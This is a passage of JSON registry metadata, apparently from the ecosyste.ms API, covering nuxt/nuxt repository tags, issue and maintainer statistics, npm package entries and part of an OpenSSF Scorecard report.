rsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"06edc8029b796b8008fe52a682159636d10f3e7a","kind":"commit","published_at":"2016-11-17T13:02:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6/manifests"},{"name":"v0.4.4","sha":"2677afb46fc4a950d62f32e6172aeaa2fdcc5a8b","kind":"commit","published_at":"2016-11-17T10:57:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"a98e6d4e9bda0491bf8f32815701f42f28c793a2","kind":"commit","published_at":"2016-11-16T17:41:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"d2c0f01593e669147396ff25c4a017372a8390ea","kind":"commit","published_at":"2016-11-16T17:06:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"b1546682ef7ce3f9ead26f328417d2589875ef46","kind":"commit","published_at":"2016-11-16T16:55:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"c5c9448a264327adab3920d07937f819f5c0a3c4","kind":"commit","published_at":"2016-11-11T14:30:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0/manifests"},{"name":"v0.3.8","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"5b0ff5617b97d050983358879b6a70835d63be8a","kind":"commit","published_at":"2016-11-10T23:01:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"cb7406cba6a42a4009660569c921f7fdca5bb209","kind":"commit","published_at":"2016-11-10T18:34:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"ea1c5dee15ed92add7e8f69bd523cb090161194e","kind":"commit","published_at":"2016-11-10T16:16:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"9f370cb97c98ff40d4ed5c871147f3c441883b7f","kind":"commit","published_at":"2016-11-10T14:09:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"a8776de913a391bfd825b56cbd5ae655d3490240","kind":"commit","published_at":"2016-11-10T13:46:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"c97c4ec32e0b5a889bd3b95f5f18d251db202354","kind":"commit","published_at":"2016-11-10T02:38:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"d88948bdeac9cd3b8c8f1c1456198e666e49664e","kind":"commit","published_at":"2016-11-10T01:19:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0/manifests"},{"name":"v0.2.6","sha":"18a2b57655a6be21a93949520a663825471fbd48","kind":"commit","published_at":"2016-11-09T22:59:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"a5780a09cae0a0109103bf660da96e479ec5ef73","kind":"commit","published_at":"2016-11-09T14:55:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"73bdfc03943799025def2b91f2402208126da453","kind":"commit","published_at":"2016-11-09T01:35:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"90a97d76ce938be645f82f538a268a83b4c9630d","kind":"commit","published_at":"2016-11-08T02:48:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"923b211a929392e7bb77e3e9326655229397ca13","kind":"commit","published_at":"2016-11-08T00:54:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"876054ed48764ef11278c27d1884d94c3153b05d","kind":"commit","published_at":"2016-11-08T00:18:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"9ebbb14eabd73ed64871d0ee59fafaad914e95f2","kind":"commit","published_at":"2016-11-07T22:26:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0/manifests"}]},"repo_metadata_updated_at":"2026-05-11T01:23:01.279Z","dependent_packages_count":0,"downloads":7,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":17.347614945716156,"dependent_repos_count":25.30552159382132,"dependent_packages_count":32.889739249478886,"stargazers_count":0.19528149439823325,"forks_count":0.7519327136499538,"average":15.29801799941291},"purl":"pkg:npm/%40dword-design/nuxt-kit","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@dword-design/nuxt-kit","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@dword-design/nuxt-kit","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@dword-design/nuxt-kit/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs","https://github.com/sponsors/nuxt"],"critical":null,"issue_metadata":{"last_synced_at":"2026-02-13T18:00:30.319Z","issues_count":6007,"pull_requests_count":6866,"avg_time_to_close_issue":11690528.2843204,"avg_time_to_close_pull_request":786776.4495867769,"issues_closed_count":4402,"pull_requests_closed_count":6050,"pull_request_authors_count":588,"issue_authors_count":3402,"avg_comments_per_issue":4.151489928416847,"avg_comments_per_pull_request":2.496213224584911,"merged_pull_requests_count":5386,"bot_issues_count":12,"bot_pull_requests_count":2972,"past_year_issues_count":940,"past_year_pull_requests_count":1678,"past_year_avg_time_to_close_issue":711939.6998050682,"past_year_avg_time_to_close_pull_request":221172.79485238457,"past_year_issues_closed_count":513,"past_year_pull_requests_closed_count":1321,"past_year_pull_request_authors_count":141,"past_year_issue_authors_count":674,"past_year_avg_comments_per_issue":2.2457446808510637,"past_year_avg_comments_per_pull_request":3.4153754469606676,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":694,"past_year_merged_pull_requests_count":1175,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1324,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"}],"active_maintainers":[{"login":"danielroe","count":321,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":72,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"Mini-ghost","count":66,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"BobbieGoede","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"cernymatej","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"DamianGlowala","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"TheAlexLichter","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"atinux","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"wattanx","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"userquin","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"productdevbook","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"dargmuesli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"ineshbose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"Hebilicious","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@dword-design%2Fnuxt-kit/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@dword-design%2Fnuxt-kit/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@dword-design%2Fnuxt-kit/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@dword-design%2Fnuxt-kit/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@dword-design%2Fnuxt-kit/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@dword-design%2Fnuxt-kit/codemeta","maintainers":[{"uuid":"dword-design","login":"dword-design","name":null,"email":"info@sebastianlandwehr.com","url":null,"packages_count":330,"html_url":"https://www.npmjs.com/~dword-design","role":null,"created_at":"2023-03-03T19:47:00.692Z","updated_at":"2023-03-03T19:47:00.692Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/dword-design/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":11343187,"name":"@rsnuxt/vue-app","ecosystem":"npm","description":null,"homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"rsnuxt","versions_count":13,"first_release_published_at":"2025-02-11T09:14:52.776Z","latest_release_published_at":"2025-08-04T03:27:04.262Z","latest_release_number":"0.5.2","last_synced_at":"2026-05-11T01:23:06.372Z","created_at":"2025-02-11T09:36:59.538Z","updated_at":"2026-05-11T01:23:06.372Z","registry_url":"https://www.npmjs.com/package/@rsnuxt/vue-app","install_command":"npm install @rsnuxt/vue-app","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"0.5.2"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-04-24T15:11:02.000Z","size":136837,"stargazers_count":60120,"open_issues_count":949,"forks_count":5591,"subscribers_count":777,"default_branch":"main","last_synced_at":"2026-04-24T20:04:41.708Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-04-24T18:27:37.000Z","dependencies_parsed_at":"2026-03-18T13:06:30.670Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":317,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and 